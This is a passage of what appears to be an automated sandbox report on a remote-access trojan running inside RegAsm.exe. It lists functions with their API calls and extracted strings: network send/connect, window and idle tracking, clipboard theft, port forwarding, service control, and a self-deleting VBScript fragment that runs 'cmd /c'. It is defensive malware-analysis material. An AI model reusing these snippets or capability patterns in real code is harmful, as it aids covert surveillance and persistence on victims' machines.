                                                        • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040A859
                                                          • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                        • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,00000000,00000000,00000000), ref: 0040A962
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                        • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                        • API String ID: 3795512280-1152054767
                                                        • Opcode ID: ff793148450d5445b41cee081077762d1b1ae7bc4452be26425da9ad383290d3
                                                        • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                        • Opcode Fuzzy Hash: ff793148450d5445b41cee081077762d1b1ae7bc4452be26425da9ad383290d3
                                                        • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E
                                                        Function 004048C8 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 144networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • connect.WS2_32(?,?,?), ref: 004048E0
                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                        • WSAGetLastError.WS2_32 ref: 00404A21
                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                        • String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                        • API String ID: 994465650-3229884001
                                                        • Opcode ID: f8a90a434b368baa81854eed5f01dc5ff272a353476d3d54f953a4ddd85b29a4
                                                        • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                        • Opcode Fuzzy Hash: f8a90a434b368baa81854eed5f01dc5ff272a353476d3d54f953a4ddd85b29a4
                                                        • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF
                                                        Function 00451346 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                        • _free.LIBCMT ref: 0045137F
                                                          • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                          • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                        • _free.LIBCMT ref: 004513A1
                                                        • _free.LIBCMT ref: 004513B6
                                                        • _free.LIBCMT ref: 004513C1
                                                        • _free.LIBCMT ref: 004513E3
                                                        • _free.LIBCMT ref: 004513F6
                                                        • _free.LIBCMT ref: 00451404
                                                        • _free.LIBCMT ref: 0045140F
                                                        • _free.LIBCMT ref: 00451447
                                                        • _free.LIBCMT ref: 0045144E
                                                        • _free.LIBCMT ref: 0045146B
                                                        • _free.LIBCMT ref: 00451483
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                        • String ID:
                                                        • API String ID: 161543041-0
                                                        • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                        • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                        • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                        • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                        Function 0040D83A Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                                          • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                                          • Part of subcall function 00413733: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?), ref: 0041374F
                                                          • Part of subcall function 00413733: RegQueryValueExA.ADVAPI32 ref: 00413768
                                                          • Part of subcall function 00413733: RegCloseKey.ADVAPI32(?), ref: 00413773
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                        • ExitProcess.KERNEL32 ref: 0040D9FF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                        • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                        • API String ID: 1913171305-3159800282
                                                        • Opcode ID: f9fb1c58427f12af755a52ca3692b6cbef369107a25d9b00b3b70057595488dd
                                                        • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                                        • Opcode Fuzzy Hash: f9fb1c58427f12af755a52ca3692b6cbef369107a25d9b00b3b70057595488dd
                                                        • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                                        Function 00450680 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                        • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                        • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                        • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                        Function 00455C5B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000), ref: 00455946
                                                        • GetLastError.KERNEL32 ref: 00455D6F
                                                        • __dosmaperr.LIBCMT ref: 00455D76
                                                        • GetFileType.KERNEL32 ref: 00455D82
                                                        • GetLastError.KERNEL32 ref: 00455D8C
                                                        • __dosmaperr.LIBCMT ref: 00455D95
                                                        • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                        • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                        • GetLastError.KERNEL32 ref: 00455F31
                                                        • __dosmaperr.LIBCMT ref: 00455F38
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                        • String ID: H
                                                        • API String ID: 4237864984-2852464175
                                                        • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                        • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                        • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                        • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                        Function 00450AA5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID: \&G$\&G$`&G
                                                        • API String ID: 269201875-253610517
                                                        • Opcode ID: f361c4fdd0f35bb0b590f5a399794b5d5c57f6d7c3c5bbd0b76040d27d65b4a3
                                                        • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                        • Opcode Fuzzy Hash: f361c4fdd0f35bb0b590f5a399794b5d5c57f6d7c3c5bbd0b76040d27d65b4a3
                                                        • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                        Function 00414BEB Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 65535$udp
                                                        • API String ID: 0-1267037602
                                                        • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                        • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                        • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                        • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                        Function 0040AD11 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                        • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                        • GetForegroundWindow.USER32 ref: 0040AD84
                                                        • GetWindowTextLengthW.USER32 ref: 0040AD8D
                                                        • GetWindowTextW.USER32 ref: 0040ADC1
                                                        • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                          • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                        • String ID: [${ User has been idle for $ minutes }$]
                                                        • API String ID: 911427763-3954389425
                                                        • Opcode ID: a9d80c92317e710bb0ee7b8060ee11baa7f71990c7fa4e3373d3f7fac537cda3
                                                        • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                                        • Opcode Fuzzy Hash: a9d80c92317e710bb0ee7b8060ee11baa7f71990c7fa4e3373d3f7fac537cda3
                                                        • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F
                                                        Function 0040DA6F Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LongNamePath
                                                        • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                        • API String ID: 82841172-425784914
                                                        • Opcode ID: 9fc837d8cdd91ddad254a0e7a0cf26b33e0d7c4ac323512d933d46fc1d77c410
                                                        • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                        • Opcode Fuzzy Hash: 9fc837d8cdd91ddad254a0e7a0cf26b33e0d7c4ac323512d933d46fc1d77c410
                                                        • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B
                                                        Function 0043A8BA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                        • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                        • __dosmaperr.LIBCMT ref: 0043A926
                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                        • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                        • __dosmaperr.LIBCMT ref: 0043A963
                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                        • __dosmaperr.LIBCMT ref: 0043A9B7
                                                        • _free.LIBCMT ref: 0043A9C3
                                                        • _free.LIBCMT ref: 0043A9CA
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                        • String ID:
                                                        • API String ID: 2441525078-0
                                                        • Opcode ID: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                                        • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                        • Opcode Fuzzy Hash: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                                        • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                        Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                        • GetMessageA.USER32 ref: 0040556F
                                                        • TranslateMessage.USER32(?), ref: 0040557E
                                                        • DispatchMessageA.USER32 ref: 00405589
                                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                        • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                        • String ID: CloseChat$DisplayMessage$GetMessage
                                                        • API String ID: 2956720200-749203953
                                                        • Opcode ID: 92a42e6f76523c23ad071d277faa5832b5c30b25a00b0af7c670b91f71b4b998
                                                        • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                                        • Opcode Fuzzy Hash: 92a42e6f76523c23ad071d277faa5832b5c30b25a00b0af7c670b91f71b4b998
                                                        • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                                        Function 00417D1A Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                        • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                        • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                        • String ID: 0VG$0VG$<$@$Temp
                                                        • API String ID: 1704390241-2575729100
                                                        • Opcode ID: 770267ec3d45abc508c60553e0d69256dfd3bd3466962ea0f4637c0737b4c84d
                                                        • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                                        • Opcode Fuzzy Hash: 770267ec3d45abc508c60553e0d69256dfd3bd3466962ea0f4637c0737b4c84d
                                                        • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                        Function 0041697B Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenClipboard.USER32 ref: 0041697C
                                                        • EmptyClipboard.USER32 ref: 0041698A
                                                        • CloseClipboard.USER32 ref: 00416990
                                                        • OpenClipboard.USER32 ref: 00416997
                                                        • GetClipboardData.USER32 ref: 004169A7
                                                        • GlobalLock.KERNEL32 ref: 004169B0
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                        • CloseClipboard.USER32 ref: 004169BF
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                        • String ID: !D@
                                                        • API String ID: 2172192267-604454484
                                                        • Opcode ID: da78ba80ec0729aaebbd7618c01a60a0d67124b513bef4f543176b1e835a0158
                                                        • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                                        • Opcode Fuzzy Hash: da78ba80ec0729aaebbd7618c01a60a0d67124b513bef4f543176b1e835a0158
                                                        • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                        Function 0041330D Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                        • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                        • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                        • CloseHandle.KERNEL32(?), ref: 004134A0
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                        • String ID:
                                                        • API String ID: 297527592-0
                                                        • Opcode ID: 574f29b59094fb47ce71c879203f8806fd1a71798bcc0508934a1059045681f6
                                                        • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                                        • Opcode Fuzzy Hash: 574f29b59094fb47ce71c879203f8806fd1a71798bcc0508934a1059045681f6
                                                        • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                        Function 0041AB9E Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                        • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                        • String ID:
                                                        • API String ID: 221034970-0
                                                        • Opcode ID: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                                        • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                        • Opcode Fuzzy Hash: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                                        • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                        Function 004481A1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _free.LIBCMT ref: 004481B5
                                                          • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                          • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                        • _free.LIBCMT ref: 004481C1
                                                        • _free.LIBCMT ref: 004481CC
                                                        • _free.LIBCMT ref: 004481D7
                                                        • _free.LIBCMT ref: 004481E2
                                                        • _free.LIBCMT ref: 004481ED
                                                        • _free.LIBCMT ref: 004481F8
                                                        • _free.LIBCMT ref: 00448203
                                                        • _free.LIBCMT ref: 0044820E
                                                        • _free.LIBCMT ref: 0044821C
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                        • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                        • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                        • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                        Function 00411530 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Eventinet_ntoa
                                                        • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                        • API String ID: 3578746661-3604713145
                                                        • Opcode ID: a7da0e03d27dfd4f061563b37853281ba9d59ca7803a508e71efe6cf15854c11
                                                        • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                                        • Opcode Fuzzy Hash: a7da0e03d27dfd4f061563b37853281ba9d59ca7803a508e71efe6cf15854c11
                                                        • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                                        Function 00455F84 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DecodePointer
                                                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                        • API String ID: 3527080286-3064271455
                                                        • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                        • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                                        • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                        • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                                        Function 0044B43C Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMONLIBRARYCODE
                                                        Download Yara Rule
